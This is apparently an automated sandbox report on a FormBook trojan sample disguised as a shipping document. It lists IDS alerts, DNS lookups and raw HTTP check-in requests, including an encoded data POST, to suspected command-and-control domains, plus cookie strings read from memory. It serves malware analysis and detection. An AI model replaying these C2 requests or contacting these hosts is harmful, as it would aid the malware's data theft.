            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49826 -> 142.202.6.230:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:49828 -> 142.202.6.230:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49829 -> 74.208.236.230:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49830 -> 74.208.236.230:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49831 -> 74.208.236.230:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:49832 -> 74.208.236.230:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49833 -> 199.59.243.226:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49834 -> 199.59.243.226:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49835 -> 199.59.243.226:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:49836 -> 199.59.243.226:80
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.spotluv.xyz
            Source: Joe Sandbox ViewIP Address: 66.235.200.145 66.235.200.145
            Source: Joe Sandbox ViewIP Address: 203.161.50.127 203.161.50.127
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewASN Name: VNPT-AS-VNVNPTCorpVN VNPT-AS-VNVNPTCorpVN
            Source: Joe Sandbox ViewASN Name: NETMAGIC-APNetmagicDatacenterMumbaiIN NETMAGIC-APNetmagicDatacenterMumbaiIN
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_004725E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_004725E2
            Source: global trafficHTTP traffic detected: GET /9m56/?_B7=LxyxWrj8kri0gh&vX=wSNNrhltoDErcnEzxm9/w28Dp1eoX3XTDY+0HSDY/xjQqFM+lgiwoO0LpiVzuA8Bz+prc1fM5Kq2+VzXMkRPAHQ+fn8FfBllirngXHZ4XxgzDhA7JZPwDGY= HTTP/1.1Host: www.costmoon.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
            Source: global trafficHTTP traffic detected: GET /hqcp/?vX=a7ZQHf8WLvhHVBvdkZq5xuKGtafV4VgGgVvybuFCKLHzqS2zk6yuhV6s1hLkbw5zmPfcdtbcw9raqNmLcm/5LDv7+9F7BWl1gWJ1Gl5m9d8a+w3Gr0PmHHU=&_B7=LxyxWrj8kri0gh HTTP/1.1Host: www.6171nvuhb.rentAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
            Source: global trafficHTTP traffic detected: GET /9qp3/?vX=ZVYu4nT3XPb6D5AnzJCZdD7dAyPNRNa3VWXdQVyX2eJo5TfLIuEqAXNcy5gjyltbfDYrkl4fema7mXoYWaQkTP4cU372CGZgosL9vb0GBN03EULPLqCD5DY=&_B7=LxyxWrj8kri0gh HTTP/1.1Host: www.motorsportgives.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
            Source: global trafficHTTP traffic detected: GET /c7lp/?vX=AZtUjmxX1+ilQa3cAX9z1397/CoXyobuelvuG0qO50IIYxbQIoa2zaoIA52olqXa0ysfLjRam7UGaI/Eozxq/aJIiPqlVVE06lZEm1LC+u5u0D0LnPSZBcs=&_B7=LxyxWrj8kri0gh HTTP/1.1Host: www.orthonow.liveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
            Source: global trafficHTTP traffic detected: GET /3c1k/?vX=JBvkiC5/p5M0KduSv9nMAq1L7Ov9kIxy2ulrSw8DAMQ+oYrb/Oqt+Mz9qyL7kOgxOchk71vbEF/036GwyUgS8aFzNiZYrtFOzFZSCs3+FXjpDA1Q93DrzfE=&_B7=LxyxWrj8kri0gh HTTP/1.1Host: www.musiccitysauce.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
            Source: global trafficHTTP traffic detected: GET /bjbg/?_B7=LxyxWrj8kri0gh&vX=PaEFrgJgmJNh1u/DWUxMIeDskG5qzMhDGrQ71u93fIH85Lzxsg5t1cmIlpAxPUwLJ58UUf9JzsDSaHkwZqJSKveW5uukdz+QiIy0PILQ7uEd2NrIiK6nDiA= HTTP/1.1Host: www.lakemontbellevue.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
            Source: global trafficHTTP traffic detected: GET /n8dl/?vX=FC28+8TNt1EBJ9Rr13Lf8bY2TrPAAO0Ms+TIyItlK84e+VLAwR127cfT6eGfINY83g5c74t6Ntc+Rr+iqurKq/8v/YzcG8LG32bad+3/XATcsm3Xq6o13Rk=&_B7=LxyxWrj8kri0gh HTTP/1.1Host: www.vintagewins.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
            Source: global trafficHTTP traffic detected: GET /pci0/?_B7=LxyxWrj8kri0gh&vX=eSBSxWzRVUHV/fBDA1gktKapDAjXHwIYGqgWiDMm1TKOgAQN0YKNcvcCpBWCJxpF3POgg0Ef/1qs6yZQX/5+pidIDj1j3gicnpT8MY0pZ20V89EBh37W5PY= HTTP/1.1Host: www.spotluv.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
            Source: global trafficHTTP traffic detected: GET /ieqg/?vX=xOYzP3dXeV68t5l1tdRGSaa1OFHMEwYl9QyrCyFOBp5kwxTuFOJ28A7LPoPnjOnXE6vKLrR6BAa5LOtmMQtvuaXLo91Bunju73veWhfgD7rjWCO2fFDcACU=&_B7=LxyxWrj8kri0gh HTTP/1.1Host: www.olhadeputat.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
            Source: global trafficHTTP traffic detected: GET /ouk5/?vX=PLWVRijYnvzxBPZV68lDWez5n1m4qNxygDOUEJJl7paGkoFy8irkxF+ePmZFSckDR+ltzcYQPDsLLRino9E0Pe5jqCKxYTXxZRA6KSseMdymxDABailrF38=&_B7=LxyxWrj8kri0gh HTTP/1.1Host: www.voupeclients.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
            Source: global trafficHTTP traffic detected: GET /fzbg/?vX=uTYyZSOtPBVL0hIsKgpi95HQtVEr7RxE1GtfhiQgzt00yp3pQHZ/yduqmfXPDQ0x8hM1I2y7MNxQRHVIE3PkPDlbAMuSsvV/gP9PT/eZTJpyk9nI4JynE2g=&_B7=LxyxWrj8kri0gh HTTP/1.1Host: www.fundraiserstuffies.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
            Source: global trafficHTTP traffic detected: GET /12kg/?vX=FNzl8wnE++HPhG206OaKKCmPORssckNSyI+M4a86U0qBkTFFPriGBeWQyCEz+v1Kx2tJcxLpZ/phLMA1BmxsvaSisGFPcKMREi9fCQxgCdocMTbgTC3h6NU=&_B7=LxyxWrj8kri0gh HTTP/1.1Host: www.paliinfra.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
            Source: global trafficHTTP traffic detected: GET /tq5r/?vX=2ahlOPqFbaLRJ59RJMyuJ7IfIQg9pPTz0C4c2znY6LEO/TCdmpUdsfBsLge4LzAAnPKkz9TLh65OzxMJqcN49ZYZ04DS6e4TLs38paEuEBs4iPeVqFZufcc=&_B7=LxyxWrj8kri0gh HTTP/1.1Host: www.selllaptop.orgAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
            Source: global trafficHTTP traffic detected: GET /9m56/?_B7=LxyxWrj8kri0gh&vX=wSNNrhltoDErcnEzxm9/w28Dp1eoX3XTDY+0HSDY/xjQqFM+lgiwoO0LpiVzuA8Bz+prc1fM5Kq2+VzXMkRPAHQ+fn8FfBllirngXHZ4XxgzDhA7JZPwDGY= HTTP/1.1Host: www.costmoon.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
            Source: global trafficHTTP traffic detected: GET /hqcp/?vX=a7ZQHf8WLvhHVBvdkZq5xuKGtafV4VgGgVvybuFCKLHzqS2zk6yuhV6s1hLkbw5zmPfcdtbcw9raqNmLcm/5LDv7+9F7BWl1gWJ1Gl5m9d8a+w3Gr0PmHHU=&_B7=LxyxWrj8kri0gh HTTP/1.1Host: www.6171nvuhb.rentAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
            Source: global trafficHTTP traffic detected: GET /9qp3/?vX=ZVYu4nT3XPb6D5AnzJCZdD7dAyPNRNa3VWXdQVyX2eJo5TfLIuEqAXNcy5gjyltbfDYrkl4fema7mXoYWaQkTP4cU372CGZgosL9vb0GBN03EULPLqCD5DY=&_B7=LxyxWrj8kri0gh HTTP/1.1Host: www.motorsportgives.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
            Source: global trafficHTTP traffic detected: GET /c7lp/?vX=AZtUjmxX1+ilQa3cAX9z1397/CoXyobuelvuG0qO50IIYxbQIoa2zaoIA52olqXa0ysfLjRam7UGaI/Eozxq/aJIiPqlVVE06lZEm1LC+u5u0D0LnPSZBcs=&_B7=LxyxWrj8kri0gh HTTP/1.1Host: www.orthonow.liveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
            Source: RpcPing.exe, 00000004.00000002.23187811443.0000000003722000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000002B62000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000006.00000002.19004125183.0000000039F42000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: .www.linkedin.comTRUE/TRUE13336872580273675bscookie"v=1&202108181112191ce8ca8a-2c8f-4463-8512-6f2d1ae6da93AQFkN2vVMNQ3mpf7d5Ecg6Jz9iVIQMh2" equals www.linkedin.com (Linkedin)
            Source: RpcPing.exe, 00000004.00000003.18807468044.0000000002E99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: .www.linkedin.combscookie/ equals www.linkedin.com (Linkedin)
            Source: RpcPing.exe, 00000004.00000003.18807468044.0000000002E99000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000004.00000003.19090634161.0000000002E99000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000004.00000002.23185487157.0000000002E99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: .www.linkedin.combscookiev10 equals www.linkedin.com (Linkedin)
            Source: global trafficDNS traffic detected: DNS query: www.costmoon.com
            Source: global trafficDNS traffic detected: DNS query: www.6171nvuhb.rent
            Source: global trafficDNS traffic detected: DNS query: www.motorsportgives.com
            Source: global trafficDNS traffic detected: DNS query: www.orthonow.live
            Source: global trafficDNS traffic detected: DNS query: www.adamknoxexperience.com
            Source: global trafficDNS traffic detected: DNS query: www.musiccitysauce.com
            Source: global trafficDNS traffic detected: DNS query: www.lakemontbellevue.com
            Source: global trafficDNS traffic detected: DNS query: www.vintagewins.com
            Source: global trafficDNS traffic detected: DNS query: www.spotluv.xyz
            Source: global trafficDNS traffic detected: DNS query: www.olhadeputat.com
            Source: global trafficDNS traffic detected: DNS query: www.voupeclients.com
            Source: global trafficDNS traffic detected: DNS query: www.fundraiserstuffies.com
            Source: global trafficDNS traffic detected: DNS query: www.marktuana.com
            Source: global trafficDNS traffic detected: DNS query: www.paliinfra.com
            Source: global trafficDNS traffic detected: DNS query: www.t8nia9vkpx.icu
            Source: global trafficDNS traffic detected: DNS query: www.selllaptop.org
            Source: unknownHTTP traffic detected: POST /hqcp/ HTTP/1.1Host: www.6171nvuhb.rentAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brOrigin: http://www.6171nvuhb.rentReferer: http://www.6171nvuhb.rent/hqcp/Content-Length: 199Connection: closeContent-Type: application/x-www-form-urlencodedCache-Control: max-age=0User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10Data Raw: 76 58 3d 58 35 78 77 45 6f 74 53 56 2f 52 53 53 33 4c 58 75 4e 6a 30 32 38 72 30 69 38 76 63 2f 42 30 2f 79 43 66 34 47 66 46 73 45 4b 75 31 79 79 61 67 34 34 53 56 67 46 2b 62 32 41 2f 70 59 79 6b 4f 77 66 4c 77 61 70 4b 4c 36 37 76 6c 72 62 44 72 58 6b 62 6b 45 78 37 41 32 61 56 41 66 6d 4e 62 6d 45 6b 37 52 78 31 38 34 74 68 6e 2b 79 2b 5a 6b 42 50 6d 4d 6d 57 6b 4b 6f 72 6b 45 73 66 42 2b 49 76 74 51 6b 74 6c 79 50 4f 4c 32 7a 55 39 52 74 44 30 38 56 42 6f 68 5a 69 41 70 62 4c 76 46 54 49 4b 59 59 2b 67 4b 62 31 58 53 61 66 54 6b 32 65 6c 50 49 45 4c 67 45 4a 4b 46 76 2f 31 58 41 3d 3d Data Ascii: vX=X5xwEotSV/RSS3LXuNj028r0i8vc/B0/yCf4GfFsEKu1yyag44SVgF+b2A/pYykOwfLwapKL67vlrbDrXkbkEx7A2aVAfmNbmEk7Rx184thn+y+ZkBPmMmWkKorkEsfB+IvtQktlyPOL2zU9RtD08VBohZiApbLvFTIKYY+gKb1XSafTk2elPIELgEJKFv/1XA==
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 626Connection: closeDate: Wed, 03 Jul 2024 15:34:51 GMTServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 59 6f 75 72 20 62 72 6f 77 73 65 72 20 63 61 6e 27 74 20 66 69 6e 64 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 20 63 6f 72 72 65 73 70 6f 6e 64 69 6e 67 20 74 6f 20 74 68 65 20 55 52 4c 20 79 6f 75 20 74 79 70 65 64 20 69 6e 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Wed, 03 Jul 2024 15:35:31 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Wed, 03 Jul 2024 15:35:34 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Wed, 03 Jul 2024 15:35:37 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 